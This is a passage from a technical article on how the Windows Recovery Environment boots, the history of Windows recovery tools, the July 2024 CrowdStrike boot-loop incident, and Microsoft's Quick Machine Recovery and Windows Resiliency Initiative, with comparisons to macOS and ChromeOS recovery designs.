The OS loader entry carries an element called recoverysequence, set to the GUID of a separate BCD entry. That separate entry is the WinRE configuration.
On a normal boot, the boot manager loads the OS entry's path (\Windows\System32\winload.efi) against the OS volume named in device/osdevice, and winload.efi brings up the kernel.
On a recovery trigger -- two failed boots, a corrupted system file, an explicit reagentc /boottore, or the user choosing Restart from the Advanced Startup menu -- the boot manager instead follows recoverysequence to the WinRE entry.
The WinRE entry's elements look like this: winpe Yes, osdevice ramdisk=[recovery]\Recovery\WindowsRE\Winre.wim,{ramdiskoptionsguid}, device ramdisk=[recovery]\Recovery\WindowsRE\Winre.wim,{ramdiskoptionsguid}, and path \Windows\System32\Boot\winload.efi. The ramdiskoptions element it points to in turn carries ramdisksdidevice and ramdisksdipath (\Recovery\WindowsRE\boot.sdi).
The boot manager creates a RAM disk backed by boot.sdi, mounts winre.wim inside it, and starts winload.efi against that ramdisk. From winload.efi's point of view, the OS being booted is the one inside winre.wim. The kernel comes up in the RAM disk and presents the Windows RE entry-point UI.

flowchart TD F[UEFI firmware] --> BM[bootmgfw.efi on ESP] BM --> BCD[Read BCD store] BCD --> CHK{Trigger fired?} CHK -- No --> OS[OS loader entry, winload.efi, Windows partition] CHK -- Yes --> RS[Follow recoverysequence GUID] RS --> WRE[WinRE BCD entry: winpe Yes, osdevice ramdisk=...winre.wim] WRE --> RD[Allocate RAM disk from boot.sdi] RD --> MNT[Mount winre.wim into RAM disk] MNT --> WL[winload.efi loads WinPE kernel] WL --> UX[WinRE entry-point UI]

The five auto-trigger conditions are enumerated verbatim in the Windows RE Technical Reference [@ms-winre-tech-ref]:

Two consecutive failed attempts to start Windows.
Two consecutive unexpected shutdowns within two minutes of boot completion.
Two consecutive system reboots within two minutes of boot completion.
A Secure Boot error (except for issues related to Bootmgr.efi).
A BitLocker error on touch-only devices.

flowchart LR A[Two failed boots] --> ENT[Enter WinRE] B[Two unexpected shutdowns within 2 min of boot] --> ENT C[Two reboots within 2 min of boot] --> ENT D[Secure Boot error -- not Bootmgr.efi] --> ENT E[BitLocker error on touch-only device] --> ENT

Walking the BCD elements themselves makes the absence of any /recovery switch visible. Here is a minimal model of what the boot manager actually consumes.

{` // Paraphrased from the BCD Boot Options Reference. Real bcdedit output is text, // but the boot manager reads it as a typed key/value store.

const bcd = { bootmgr: { type: 'Windows Boot Manager', default: '{current}', displayorder: ['{current}'], }, '{current}': { type: 'Windows Boot Loader', device: 'partition=C:', osdevice: 'partition=C:', path: '\\Windows\\system32\\winload.efi', description: 'Windows 11', recoverysequence: '{a1b2-...-winre-guid}', recoveryenabled: 'Yes', }, '{a1b2-...-winre-guid}': { type: 'Windows Boot Loader', device: 'ramdisk=[\\Device\\HarddiskVolume4]\\Recovery\\WindowsRE\\Winre.wim,{ramdiskopts}', osdevice: 'ramdisk=[\\Device\\HarddiskVolume4]\\Recovery\\WindowsRE\\Winre.wim,{ramdiskopts}', path: '\\Windows\\system32\\Boot\\winload.efi', description: 'Windows Recovery Environment', winpe: 'Yes', nx: 'OptIn', }, '{ramdiskopts}': { type: 'Device Options', description: 'Ramdisk Options', ramdisksdidevice: 'partition=\\Device\\HarddiskVolume4', ramdisksdipath: '\\Recovery\\WindowsRE\\boot.sdi', }, };

// The boot manager picks one of these entries, depending on whether // recoverysequence has been activated. No command-line flag is involved.

const chosen = bootDecision(2, false, false); console.log('Loader path the boot manager invokes:'); console.log(' ' + chosen.path); console.log('Backing device:'); console.log(' ' + chosen.osdevice); console.log('winpe flag (Yes means "boot a WIM into a ramdisk"):'); console.log(' ' + (chosen.winpe || '(unset, normal OS boot)')); `}

That is the entire mechanism. Two failed boots flip an in-BCD counter; the boot manager follows recoverysequence instead of the default loader path; the WinRE entry mounts winre.wim in a RAM disk; the kernel inside winre.wim comes up. No flags, no shells, no scripts.

Now we know what WinRE is and how it boots. The remaining historical question is how this architecture came to be, and what about it did not change between 2007 and July 19, 2024.

4. Historical Origins: From the Recovery Console to the Recovery Partition (2000-2012)

Every architectural choice in WinRE was a response to something that did not work the year before. Walk the four pre-WRI generations of Windows recovery and the story is one long relaxation of the assumption that recovery requires physical media.

Generation 1: Emergency Repair Disk (NT 3.x and 4.0, 1993-2000)

A floppy disk plus a %SystemRoot%\repair directory contained snapshotted SYSTEM, SOFTWARE, SAM, and SECURITY registry hives [@wiki-recovery-console]. The administrator booted from the three Windows NT Setup floppies, pressed R for Repair, fed the floppy when prompted, and Setup wrote the snapshotted hives back over the damaged on-disk copies. ERD repaired the registry, nothing more. If NTOSKRNL.EXE itself was missing, the operator was reduced to a DOS floppy plus EXPAND from the install CD. The architecture's failure mode was the obvious one for a floppy-based snapshot system: the floppy got lost; the snapshot was stale; the scope was too narrow.

The Windows NT 3.x and 4.0 recovery mechanism: a snapshot of the registry hives written to a floppy by `RDISK.EXE` plus a small `%SystemRoot%\repair` folder. Restored only the registry; required the NT Setup floppies to boot. Wikipedia's *Recovery Console* article identifies the Recovery Console as ERD's successor [@wiki-recovery-console].

Generation 2: Recovery Console (Windows 2000, February 17, 2000)

The Recovery Console replaced the binary "restore the snapshot" decision with a programmable shell. Boot from the Windows 2000 or XP install CD; choose Repair; the operator landed in a cmd.exe-shaped environment with around three dozen internal commands: copy, del, attrib, chkdsk, fixboot, fixmbr, bootcfg, and the rest [@wiki-recovery-console]. Authentication required the local Administrator password; filesystem access was sharply constrained (read-only by default; on the boot volume only the root and %SystemRoot% were writable, unless Group Policy relaxed those limits).

The Windows 2000/XP/Server 2003 command-line repair shell. Initial release February 17, 2000; superseded by the Windows Recovery Environment in Windows Vista. Loadable from the install CD or installable as a startup option via `winnt32 /cmdcons`. Wikipedia lists Windows Recovery Environment as its named successor [@wiki-recovery-console].

The Recovery Console did not fail technically. It failed culturally. By 2005 the Windows administrator population had shifted decisively to GUI tools. A 2005 user with a corrupt WINLOAD.EXE and no install CD had no path to repair the box without buying replacement media. There was no automatic-repair logic and no on-disk presence; the install CD was always required, and every fix demanded muscle memory the typical administrator no longer had.

Generation 3: WinRE on Installation Media (Windows Vista, January 2007)

Vista shipped a full GUI recovery environment built on the brand-new Windows PE 2.0 [@wiki-winpe]. winre.wim carried Startup Repair (a probe-and-fix playbook for boot failures), System Restore (now backed by the Volume Shadow Copy Service), Complete PC Restore, Windows Memory Diagnostic, and a command prompt for the cases nothing else fit. Vista was also the version that introduced the Boot Configuration Data store and bootmgr, replacing NTLDR and the plain-text boot.ini [@ms-bcd]. The same BCD that today still routes the recovery handoff was written for Vista.The Microsoft Learn "Vista WinRE Overview" page in the previous-versions archive (cc766056) is now misdirected and renders an unrelated USMT migration topic instead of the original article. The load-bearing claim that WinRE was introduced in Vista is independently supported by the Windows PE Wikipedia article's version table (WinPE 2.0 built from Vista RTM) and by Microsoft Learn's Push-button reset overview, which dates Push-Button Reset to Windows 8 and frames it as built on the existing WinRE architecture [@wiki-winpe, @ms-pbr-overview].

Vista WinRE had two architectural problems that the next generation fixed. OEMs were free to put winre.wim wherever they wanted on disk; there was no standard partition. And the install DVD remained the fallback for any user whose OEM had not pre-installed WinRE -- which, by 2010, was most users, none of whom still owned the DVD.

System Restore is itself a sub-thread worth noting. It first shipped in Windows ME (year 2000), was re-implemented atop VSS in Vista, and remained off by default on Windows 10 and 11 [@wiki-system-restore]. The Vista move made it callable from WinRE even when the host Windows would not boot -- a property that, twenty-five years later, Point-in-Time Restore is re-engineering for the cloud.

Generation 4: Recovery Partition + ReAgentC + BCD `recoverysequence` (Windows 7, 2009; standardised in Windows 8 and beyond)

This is the architecture every Windows 11 device still runs.

Windows 7 dropped winre.wim onto a dedicated recovery partition with a GPT Type ID that lets bootmgr find it without depending on the Windows volume's drive letter [@ms-uefi-gpt]. ReAgentC.exe became the in-box management tool [@ms-reagentc]. The BCD recoverysequence element became the mechanism by which the OS loader entry points at the WinRE entry. The two-failed-boots trigger entered the Windows RE Technical Reference's enumeration of automatic conditions [@ms-winre-tech-ref].

Generation 4 did not fail. The five auto-trigger conditions still fire on Windows 11 24H2. ReAgentC's switches are still the supported management surface. The recovery-partition GPT Type ID is still DE94BBA4-06D1-4D40-A16A-BFD50179D6AC. It is the architectural floor every later generation extends, including Quick Machine Recovery.

What Generation 4 did not solve was the cost of recovery at fleet scale. WinRE-on-disk handled one machine perfectly; it had nothing to say about ten thousand machines, each still bounded by the time it took to walk to a desk.

gantt dateFormat YYYY axisFormat %Y section Pre-WinRE Emergency Repair Disk (NT 3.x / 4.0) :1993, 2000 Recovery Console (Windows 2000 onwards) :2000, 2008 section WinRE WinRE on installation media (Vista) :2007, 2009 Recovery partition + ReAgentC (still current) :2009, 2026 section Recovery flavours Push-Button Reset (Windows 8 onwards) :2012, 2026 Autopilot Reset (Win 10 1709) :2017, 2026 Quick Machine Recovery (24H2) :2025, 2026 Intune Remote Recovery / Cloud Rebuild :2025, 2026

A few parallel paths deserve naming. Push-Button Reset, introduced in Windows 8 in 2012, gave consumers an in-WinRE "Refresh" or "Reset"; image-less reset in Windows 10 and Cloud Download in Windows 10 version 2004 (May 2020) made the reset progressively less dependent on locally-staged install images [@ms-pbr-overview]. Autopilot Reset, shipped in Windows 10 1709 (October 2017), let Intune issue an MDM-initiated wipe-and-rebuild that preserved the device's Entra ID join. Microsoft Diagnostics and Recovery Toolset (DaRT) -- the descendant of Winternals ERD Commander acquired in 2006 and shipped under MDOP starting July 2007 (MDOP 2007), with subsequent releases through MDOP 2008 (April 2008) -- gave Software Assurance customers a richer enterprise tool on top of WinPE [@wiki-mdop-dart]. Older recovery mechanisms quietly aged out: Last Known Good Configuration was no longer the default boot-failure response on Windows 8 onward, and the deprecated-features lifecycle framework is the canonical place to track such retirements today [@ms-deprecated].

By the early 2010s, the architecture that still runs on every Windows 11 device today was largely in place [@ms-winre-tech-ref, @ms-reagentc]. None of these tools gave WinRE permission to call Windows Update from inside the recovery environment. That gap is the next chapter.

5. The Forcing Function: July 19, 2024

We know what WinRE is. We know how it boots. We can now see the CrowdStrike incident as the architecture's stress test. The headline numbers are well-rehearsed at this point; what matters here is the technical cause, the kernel-resident dependency it expressed, and the procedure Microsoft published.

The fault

CrowdStrike's Falcon sensor for Windows version 7.11, released in February 2024, introduced a new IPC Template Type used by behavioural detection logic [@crowdstrike-rca-pdf]. The Template Type declared twenty-one input parameter fields. The integration code that invoked the in-driver Content Interpreter to evaluate Template Instances against host activity supplied only twenty inputs [@crowdstrike-rca-pdf]. For more than four months, Channel File 291 contained no Template Instance whose criterion read the twenty-first field. That made the mismatch latent.

At 04:09 UTC on July 19, 2024, CrowdStrike pushed a new Channel File 291 containing a Template Instance that referenced the twenty-first field with a non-wildcard matching criterion [@crowdstrike-rca-pdf, @crowdstrike-tech-details]. The Content Interpreter loaded the instance, looked up the twenty-first input pointer in its input-pointer array, and read past the end of that array. Sensors running 7.11 or later that received the update between 04:09 and 05:27 UTC tripped the latent out-of-bounds read [@crowdstrike-tech-details].

The crash

Microsoft's Windows Error Reporting analysis, published in the security blog on July 27, 2024, recorded the global crash signature as nt!KeBugCheckEx followed by nt!KiPageFault and then csagent+0xe14ed, with r8=ffff840500000074 as the invalid pointer that the read tried to dereference [@ms-security-jul27]. Microsoft confirmed that the analysis matched CrowdStrike's own conclusion: a read-out-of-bounds memory safety error in the csagent.sys driver.

flowchart TD A[Falcon 7.11 ships in Feb 2024 with IPC Template Type declaring 21 fields] --> B[Integration code supplies only 20 inputs] B --> C[Latent OOB potential -- no instance references field 21] C --> D[July 19 04:09 UTC: new Channel File 291 adds non-wildcard 21st-field criterion] D --> E[Content Interpreter reads input-pointer index 20] E --> F[Page fault at csagent+0xe14ed] F --> G[nt!KiPageFault -> nt!KeBugCheckEx] G --> H[Bug check; system reboots] H --> I[csagent.sys reloads -- registered SERVICE_SYSTEM_START Start=1 -- bug check again] I --> J[Boot loop on 8.5 million endpoints]

The kernel-resident dependency

csagent.sys loaded early in boot. Microsoft's WER post-mortem shows the driver registered with REG_DWORD Start 1 -- the SERVICE_SYSTEM_START class, loaded by the kernel before user-mode comes up [@ms-security-jul27]. That placement is the entire point of a kernel-mode security agent: it has to instrument the kernel boundary at the moment user-mode would otherwise be invisible to it. The cost of that placement is that when an early-boot driver page-faults, the bug check happens before the operating system is interactive. The remediation -- delete C-00000291*.sys -- could not be issued from a running Windows, because there was no running Windows.

The fault dynamic above is easier to describe than it is to file. CrowdStrike's own technical-details post is explicit about the file-type distinction: "Although Channel Files end with the SYS extension, they are not kernel drivers" [@crowdstrike-tech-details]. The kernel-mode component is `csagent.sys`. The Channel Files in `C:\Windows\System32\drivers\CrowdStrike\` are *data* that the Content Interpreter inside `csagent.sys` reads. The fault was a bug in `csagent.sys`'s interpretation of a particular Channel File; both ends matter, and the file extension on the data file is incidental.

The recovery procedure

Microsoft published KB5042421 within hours [@ms-kb5042421]. The text reduced to three steps: boot to Safe Mode (which on Windows 11 means letting WinRE select Safe Mode from the Advanced startup options tree); delete C:\Windows\System32\drivers\CrowdStrike\C-00000291*.sys; reboot. For BitLocker-encrypted volumes the procedure had a fourth, preliminary step: surface the recovery key. KB5042421 walks the user through the Entra ID self-service flow at aka.ms/aadrecoverykey: log on from a phone, choose Manage Devices, View BitLocker Keys, Show recovery key [@ms-kb5042421].

The instruction was correct. It was also unambiguously per-machine.

We currently estimate that CrowdStrike's update affected 8.5 million Windows devices, or less than one percent of all Windows machines. -- Microsoft, *Helping our customers through the CrowdStrike outage*, July 20, 2024 [@ms-crowdstrike-jul20].

The bottleneck

Each device's recovery was a function of time-to-physical-access, plus time-to-BitLocker-key, plus time-to-keyboard. None of those terms scaled. A laptop on a desk that the owner happened to be near recovered in five minutes. A laptop on a desk where the owner was on holiday recovered when someone arrived to swipe their badge. A server in a remote data centre recovered when a hand reached the iLO or KVM. A point-of-sale device in a checked-bag-only baggage hall recovered when someone wheeled a USB keyboard out to it. Multiply by 8.5 million.

The architecture that delivered Safe Mode to every one of those devices did exactly what its 2009 specification said it would do. The architecture that delivered Safe Mode to every one of those devices left enterprises stranded for days. Both sentences are true. The contradiction is the whole point.

Note: WinRE booted correctly. The Safe Mode tile rendered. The two-failed-boots trigger fired. The recovery partition was where it should be. The BCD recoverysequence led to the right winre.wim. The keyboard handler took keystrokes. Every line of code did what it was specified to do. The single unwritten line of the specification -- one operator, please -- was the line that did not scale.

The instruction was correct, the procedure was published within hours, and the floor was on fire for days. The next question -- the one Microsoft was already being asked at WESES, the closed-door September 10, 2024 endpoint-security partner summit [@ms-weses] -- was whether the floor could not be on fire next time.

6. The Breakthrough: Quick Machine Recovery

Quick Machine Recovery, announced at Microsoft Ignite on November 19, 2024 [@ms-wri-ignite-2024] and generally available on Windows 11 24H2 build 26100.4700+ in August 2025 per the November 18, 2025 update [@ms-wri-ignite-2025], did not add any new technology to WinRE that had not been in WinPE since 2002. Networking drivers, DHCP clients, HTTPS stacks: all of these were already in winre.wim's base image, inherited from the WinPE Optional Components that have shipped with the OS for two decades [@ms-winpe-intro]. What QMR added was an answer to a question WinRE had never been asked: when you are inside the recovery environment with no operator at the keyboard, who do you call?

The Windows 11 24H2 feature, available on build 26100.4700 or later, that lets WinRE establish network connectivity from inside the recovery environment, query Windows Update for a remediation matching the current failure signature, download and apply that remediation, and reboot -- all without requiring an operator at the keyboard [@ms-qmr]. Announced at Microsoft Ignite on November 19, 2024 [@ms-wri-ignite-2024]; first shipped in Windows 11 Insider Preview build 26120.3653 on March 28, 2025 [@ms-qmr-insider-mar2025]; generally available in August 2025 [@ms-wri-ignite-2025].

The five-phase loop

Microsoft Learn documents QMR as five phases [@ms-qmr]:

Crash detection. The same two-failed-boots trigger already in the Windows RE Technical Reference [@ms-winre-tech-ref] fires the recovery path.
Boot to recovery. The existing BCD recoverysequence mechanism from Section 3 routes the system into WinRE.
Network connection. WinRE establishes wired Ethernet, or WPA/WPA2 password-based Wi-Fi using a credential pre-staged via reagentc.exe /SetRecoverySettings. As of the Microsoft Learn page's current wording, only wired and WPA/WPA2 password-based wireless are supported [@ms-qmr]; enterprise certificates and WPA3-Enterprise are on the November 18, 2025 roadmap but not yet shipped [@ms-wri-ignite-2025].
Remediation. The recovery environment scans Windows Update for a published remediation matching the device's failure signature, downloads it, and applies it.
Reboot. On success, the device boots normally. On no-match, the device can either present the manual recovery menu (the one-time scan mode, the default for unmanaged systems) or loop with a configurable interval (the looped mode) until either a remediation arrives or the operator-set total wait time expires [@ms-qmr].

sequenceDiagram participant D as Device (OS) participant W as WinRE participant N as Network participant WU as Windows Update participant O as OS partition D->>W: Two failed boots -> follow recoverysequence W->>N: Acquire Ethernet or WPA2 Wi-Fi W->>WU: Query for remediation matching failure signature WU-->>W: Remediation package (or "none found") alt Remediation available W->>O: Apply remediation to OS partition W->>D: Reboot D-->>D: Normal boot succeeds else None found, one-time mode W->>D: Present manual recovery menu else None found, looped mode W-->>W: Sleep wait_interval, retry until total_wait_time end

The default-on/off matrix

The Microsoft Learn QMR page is explicit on defaults [@ms-qmr]. Cloud remediation is enabled by default, with one-time scan auto-remediation, on systems that are not under enterprise management -- Windows Home and unmanaged Pro. It is disabled by default on enterprise-managed systems -- Windows Enterprise, Education, and managed Pro. The rationale follows from how those populations think: enterprise administrators want to gate cloud remediation behind their own deployment-ring process, and consumers benefit from the default-on behaviour because they do not have a ring process at all. The same Microsoft Learn page documents an Intune Settings Catalog policy under Remote Remediation > Enable Cloud Remediation for administrators who want to switch the policy on at the tenant level [@ms-qmr].

The test-mode flow

QMR ships with a dry-run mechanism. reagentc.exe /SetRecoveryTestmode configures the WinRE entry for a simulated recovery cycle; reagentc.exe /BootToRe triggers the cycle on the next reboot; the simulated remediation appears in Settings > Windows Update > Update history rather than mutating the production OS [@ms-qmr]. Microsoft suggests using the test mode to validate the per-device QMR configuration before relying on it in production.

The pseudocode

The five phases collapse into a short loop. The version below is paraphrased from the Microsoft Learn QMR page [@ms-qmr] and shows how the two settings interact.

{` // Paraphrased from the Microsoft Learn QMR specification.

const config = { cloud_remediation_enabled: true, // default on Home/unmanaged Pro auto_remediation_mode: 'looped', // 'one_time' | 'looped' total_wait_time_minutes: 60, wait_interval_minutes: 10, wifi: { ssid: 'corp-recovery', psk: '***', encryption: 'WPA2' }, };

function detectFailureSignature() { return { driver: 'csagent.sys', offset: '0xe14ed', signature: 'oob-read' }; }

function scanWindowsUpdate(signature) { if (signature.driver === 'csagent.sys' && signature.signature === 'oob-read') { return { id: 'qmr-csagent-291', action: 'delete', path: 'C\\Windows\\System32\\drivers\\CrowdStrike\\C-00000291*.sys' }; } return null; }

function qmrEnterRecovery() { console.log('Phase 1: crash detected (two failed boots)'); console.log('Phase 2: booted into WinRE via BCD recoverysequence');

if (!config.cloud_remediation_enabled) { console.log('Cloud remediation disabled; falling back to Startup Repair'); return; }

console.log('Phase 3: acquiring network (' + config.wifi.encryption + ' Wi-Fi)'); const sig = detectFailureSignature(); let elapsed = 0;

while (true) { console.log('Phase 4: scanning Windows Update for remediation matching ' + sig.driver); const remediation = scanWindowsUpdate(sig); if (remediation) { console.log(' -> Applying ' + remediation.id + ' (delete ' + remediation.path + ')'); console.log('Phase 5: reboot into repaired Windows'); return; } if (config.auto_remediation_mode === 'one_time') { console.log('No remediation found; presenting manual recovery menu'); return; } elapsed += config.wait_interval_minutes; if (elapsed >= config.total_wait_time_minutes) { console.log('Looped mode exhausted; falling back to manual recovery menu'); return; } console.log(' -> No match; sleeping ' + config.wait_interval_minutes + ' min'); } }

qmrEnterRecovery(); `}

The counterfactual

Had QMR existed on July 19, 2024, the per-device labour would have been zero. Microsoft and CrowdStrike would have published a Windows Update remediation that deletes C-00000291*.sys; every affected device would have entered WinRE on its second failed boot, picked up the remediation, applied it, and rebooted. The 8.5-million-device fleet cost would have collapsed from operator-days to network-minutes. The CrowdStrike RCA published August 6, 2024 documents that the fault-to-rollback time was 78 minutes [@crowdstrike-tech-details, @crowdstrike-rca-pdf]; QMR would have made time-to-rollback and time-to-fleet-recovery the same number, plus the per-device Windows Update transit. That is the empirical case Microsoft is making.

Key idea: Quick Machine Recovery did not add new technology to WinRE. It added a question. WinRE has always had networking drivers; it had never been told it had permission to phone home. The technical innovation is policy, not code -- the Windows Update endpoint framing is a commitment that the recovery environment may, in well-defined circumstances, act on behalf of the operator who is not there.

QMR re-priced the per-device cost of recovery from O(N) to roughly O(1). But QMR alone does not explain why Microsoft is calling this the Windows Resiliency Initiative rather than the Quick Machine Recovery Release. The next section unpacks the five layers WRI puts around QMR.

7. The Program: The Windows Resiliency Initiative as Five Layers

WRI is not one feature. It is a layered program. Each layer is a Microsoft-named deliverable with a Microsoft-cited source. The temptation, on reading any single WRI blog post, is to confuse the layer with the program. The layers are concentric. They are also dated.

Walk the five layers. Each has a Microsoft term, a primary anchor, and a published status as of November 18, 2025.

Layer	Microsoft term	Anchor	Status as of Nov 18, 2025
Prevent: stop bad updates leaving the partner	Safe Deployment Practices (SDP), part of MVI 3.0	[@ms-wri-ignite-2024], [@ms-mvi], [@ms-wri-jun-2025]	Effective April 1, 2025 [@ms-wri-ignite-2025]
Prevent: stop bad code being kernel-resident	Windows endpoint security platform (user-mode antivirus)	[@ms-wri-ignite-2024], [@ms-wri-jun-2025], [@ms-wri-ignite-2025]	Private preview July 2025; named partners in [@ms-wri-jun-2025]
Manage: see the incident at scale	Intune surfaces WinRE state; Mission Critical Services for Windows	[@ms-wri-ignite-2025]	Coming soon
Recover: heal the unbootable machine	Quick Machine Recovery	[@ms-wri-ignite-2024], [@ms-qmr], [@ms-wri-ignite-2025]	GA August 2025
Recover: rebuild without shipping hardware	Point-in-Time Restore, Cloud Rebuild, Windows 365 Reserve	[@ms-wri-ignite-2025]	PITR Insider preview Nov 2025; W365R GA; Cloud Rebuild coming

flowchart LR subgraph L1[1. Prevent: stop bad updates at the partner -- MVI 3.0 SDP] subgraph L2[2. Prevent: stop bad code being kernel-resident -- user-mode AV platform] subgraph L3[3. Manage: see the incident at scale -- Intune surfaces WinRE state] subgraph L4[4. Recover the unbootable: Quick Machine Recovery] subgraph L5[5. Rebuild without shipping hardware: PITR / Cloud Rebuild / W365 Reserve] CORE[Windows endpoint -- recoverable at fleet scale] end end end end end

Layer 1: Safe Deployment Practices and MVI 3.0

Microsoft Virus Initiative 3.0 became effective on April 1, 2025 [@ms-wri-ignite-2025]. Membership now requires partners to commit to four named obligations [@ms-mvi]: a signed nondisclosure agreement; use of Microsoft Trusted Signing (the hosted descendant of Authenticode) for AV/EDR driver code-signing; documented Safe Deployment Practices for content updates (gradual rollouts with deployment rings and monitoring); and certification within the last 12 months by at least one of AV-Comparatives, AVLab Cybersecurity Foundation, AV-Test, MRG Effitas, SE Labs, SKD Labs, VB 100, or West Coast Labs [@ms-mvi]. The June 26, 2025 WRI update lists eight named partner endorsements -- Bitdefender (Florin Virlan), CrowdStrike (Alex Ionescu), ESET (Juraj Malcho), SentinelOne (Stefan Krantz), Sophos (John Peterson), Trellix (Jim Treinen), Trend Micro (Rachel Jin), and WithSecure (Johannes Rave) -- and the November 18, 2025 update confirms the effective date verbatim: "Effective April 1, 2025, Version 3.0 of the Microsoft Virus Initiative added new requirements for all Windows antivirus (AV) partners to maintain signing rights for Windows AV drivers" [@ms-wri-jun-2025, @ms-wri-ignite-2025].

Microsoft's program for third-party antivirus and endpoint detection vendors that ship products on Windows. MVI 3.0, effective April 1, 2025, adds Safe Deployment Practices, mandatory Trusted Signing, NDA, and 12-month independent test-lab certification as preconditions to maintain Windows AV driver signing rights [@ms-mvi, @ms-wri-ignite-2025].

The model is structurally identical to the canary / progressive-rollout pattern formalised in the Google SRE Book chapter on Release Engineering: hermetic builds, multiple deployment rings, gated promotion between rings, "Push on Green", and the option to cherry-pick at the same revision when a critical change is needed mid-cycle [@sre-release-eng]. MVI 3.0 is not a Microsoft invention; it is a Microsoft mandate of a model that has been industry practice for two decades. The mandate is what is new.

Layer 2: The Windows endpoint security platform

The same November 19, 2024 keynote committed to a Windows endpoint security platform that lets partners ship their detection logic outside kernel mode, with a private preview promised to security-partner programs by July 2025 [@ms-wri-ignite-2024]. The June 26, 2025 update confirmed the date with named partner endorsements [@ms-wri-jun-2025]. The architectural premise is the one BSOD survivors recognise immediately: a faulty user-mode component can be killed by Task Manager; a faulty kernel-mode driver bug-checks the system.

Graphics drivers, for example, will continue to run in kernel mode for performance reasons. -- Microsoft, *Preparing for what's next*, November 18, 2025 [@ms-wri-ignite-2025].

Microsoft is careful to frame WRI as a floor-raiser, not a kernel ban. The November 18, 2025 update enumerates the driver-resiliency playbook for the surfaces that will remain in kernel mode: mandatory compiler safeguards (control-flow integrity, CFG, stack canaries), driver isolation, DMA-remapping, a higher signing bar, and expanded in-box Microsoft drivers and APIs that third parties can call rather than reimplementing [@ms-wri-ignite-2025]. The argument is that the kernel surface that must exist (graphics, storage, some networking) should be smaller, better isolated, and equipped with mitigations that contain a single fault.

The June 2025 partner roster is the most pointed piece of evidence that the user-mode direction predates and outlasts the July 2024 incident. CrowdStrike itself is named [@ms-wri-jun-2025]. The vendor that started the chain reaction is publicly endorsing the architectural concession the chain reaction priced into existence.

The Windows Resiliency Initiative is not Microsoft's only post-2023 security program. The umbrella is the *Secure Future Initiative* (SFI), announced in November 2023 as the company-wide response to identity-based attacks on Microsoft itself. WRI is the workstream inside SFI that owns Windows availability, kernel resilience, and the recovery path; SFI also owns identity hardening, supply-chain controls, and engineering culture changes. Microsoft's published WRI blogs are explicit that the recoverability program is "the Windows pillar of our Secure Future Initiative" framing, not a stand-alone effort [@ms-wri-ignite-2024, @ms-wri-jun-2025].

Layer 3: Intune-surfaced WinRE state

The November 18, 2025 update names a new Intune signal: "Intune will surface when a Windows device has booted into the Windows Recovery Environment (WinRE)" [@ms-wri-ignite-2025]. The same signal will appear in the Azure Portal for Windows Server VMs that switched into WinRE. The same update introduces a WinRE plug-in model: IT administrators can push custom recovery scripts through Intune, with the model documented as third-party-MDM-adoptable. Both are "coming soon" as of that announcement [@ms-wri-ignite-2025].

The architectural insight here is that Microsoft-pushed remediations (QMR) and administrator-pushed remediations (Intune scripts) must be expressible against the same WinRE surface, with Intune providing the visibility and audit layer.

Layer 4: Quick Machine Recovery

Already covered in Section 6. Status: GA August 2025 on Windows 11 24H2 build 26100.4700+ [@ms-qmr, @ms-wri-ignite-2025]. Autopatch QMR management is in preview at the November 2025 announcement [@ms-wri-ignite-2025].

Layer 5: Rebuild without shipping hardware

The November 18, 2025 update introduces three Microsoft-cloud-side recovery actions [@ms-wri-ignite-2025]:

Point-in-Time Restore (PITR). Cloud-orchestrated rollback to an earlier point-in-time snapshot of the device's full state. Status: available in the Windows Insider preview build the week of the announcement.
Cloud Rebuild. Intune-portal-triggered clean OS reimage using Autopilot for zero-touch provisioning, with user data and settings restored from OneDrive and Windows Backup for Organizations. Status: coming.
Windows 365 Reserve. A temporary Cloud PC for users whose endpoint is unusable. Status: generally available.

Each of these targets a scenario QMR cannot fix. PITR addresses regressions that the user-mode WU pipeline cannot patch back -- driver downgrades that need to roll back state, not push a new patch. Cloud Rebuild addresses devices whose local Windows is genuinely beyond surgical repair. Windows 365 Reserve addresses the productivity gap while the local device is being recovered.

All five layers are anchored on Microsoft blogs and Microsoft Learn pages. None of them is unique to Microsoft. Apple, ChromeOS, and the Linux atomic distributions have each chosen a different layered architecture for the same problem. What does the field actually look like?

8. Competing Models: Apple, ChromeOS, and the Linux Atomic Distributions

Microsoft is not the first vendor to treat recovery as part of its security architecture. It is, at consumer scale, among the last. Apple, Google, and the Linux atomic-distribution community each picked a different layer to anchor on.

Apple macOS: Signed System Volume + paired/fallback recoveryOS + 1TR

macOS 10.15 (Catalina, 2019) introduced the read-only system volume. macOS 11 (Big Sur, 2020) added the Signed System Volume on top of it: a SHA-256 Merkle tree over every block of the system volume, sealed by Apple at install or update time [@apple-ssv]. On Apple Silicon, the bootloader verifies the seal before transferring control to the kernel; on Intel-based Macs with the T2 Security Chip, the bootloader forwards the measurement and signature to the kernel, which verifies the seal directly before mounting the root file system [@apple-ssv]. On verification failure, the Mac drops into recoveryOS automatically and prompts the user to reinstall.

The recovery side has three flavours [@apple-boot]: a paired recoveryOS that exactly matches the installed system version; on Apple Silicon, a fallback recoveryOS (the previous OS version); and a hardware-anchored 1TR ("one true recovery") environment that survives even when the paired recoveryOS is broken. The 1TR environment is anchored in the Secure Enclave, which is the macOS analogue of Windows's signed bootmgfw.efi on the EFI System Partition.

What Apple excels at is tampered system files and failed updates: the first block read fails Merkle verification; the snapshot pointer flips to the prior good snapshot; the user reboots into a working system. What Apple does not have is an analogue of QMR's targeted remediation pipeline. The macOS answer to a faulty signed third-party security agent is "reinstall macOS". That is wipe-and-reload, not surgical repair.

ChromeOS: Verified Boot + A/B root partitions + auto-rollback

ChromeOS's verified-boot design has been the same since 2010 [@chromium-verified-boot]. A read-only boot stub, anchored in write-protected EEPROM, computes a cryptographic hash of the read-write firmware (SHA-1 in the original 2010 specification; SHA-256 in current production firmware) and verifies an RSA signature (at least 2048 bits) against a permanently stored public key [@chromium-verified-boot]. The verified read-write firmware then hashes the kernel and verifies its signed hashes. A transparent block device in the kernel verifies each block against a stored hash tree on every read, with the tree's root signed by the firmware.

The recovery story is the brilliant part. ChromeOS devices have two root partitions, ROOT-A and ROOT-B, plus a separate stateful partition for user data [@chromium-autoupdate]. Each root partition carries a remaining_attempts counter (default 6) stored in unused GPT bits next to the bootable flag. On N consecutive failed boots, the boot loader falls back to the other partition. Auto-updates always write to the partition not currently in use, never the booted one. The result is that ChromeOS recovers from a faulty signed system update in one reboot per device, automatically, without an operator action. This is the empirical upper bound on automation: no fielded platform recovers a signed-but-faulty boot path faster than one reboot.

Linux atomic distributions: OSTree, rpm-ostree, bootc

